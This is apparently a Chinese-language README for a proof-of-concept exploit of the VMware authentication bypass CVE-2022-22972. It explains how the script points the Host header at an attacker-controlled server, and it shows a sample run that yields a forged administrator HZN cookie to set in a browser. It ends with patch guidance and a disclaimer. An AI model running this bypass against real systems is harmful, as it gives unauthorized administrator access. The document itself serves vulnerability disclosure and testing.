CVE-2022-22972 的概念验证(POC),影响 VMware Workspace ONE、vIDM 和 vRealize Automation 7.6。
该漏洞的技术根因分析可以在我们的博客上找到: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
此脚本可用于通过 CVE-2022-22972 绕过 vRealize Automation 7.6 的身份验证。Workspace ONE 和 vIDM 具有不同的身份验证端点,但漏洞的核心仍然相同。如果您有测试工件来验证流程,我们很乐意接受拉取请求。
该脚本通过更改 VMware 身份验证端点的 HTTP POST 请求中的 Host 标头,将其更改为攻击者控制的主机。这会导致 VMware 应用程序使用凭据信息向该主机发出请求,如果该主机返回 200,则用户成功通过身份验证。
该脚本会生成一个 HZN cookie,可以将其包含在后续请求中,以冒充受感染用户执行操作。
注意:脚本的默认参数会将身份验证请求发送到 我们的 AWS API 网关,该网关配置为对博客中提到的特定端点回复 200。您可以使用 --host 选项更改此设置。在漏洞利用流程中,此端点 不会接收任何敏感数据——只会收到来自易受攻击应用程序的包含伪造认证标头的请求,然后它会回复该请求。
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
Set the HZN cookie in your browser to bypass authentication
更新到最新版本,或按照 VMSA 中的说明进行缓解
本软件完全出于学术研究和开发有效防御技术的目的而创建,不应用于攻击系统,除非明确授权。项目维护者对软件的滥用不承担任何责任。请负责任地使用。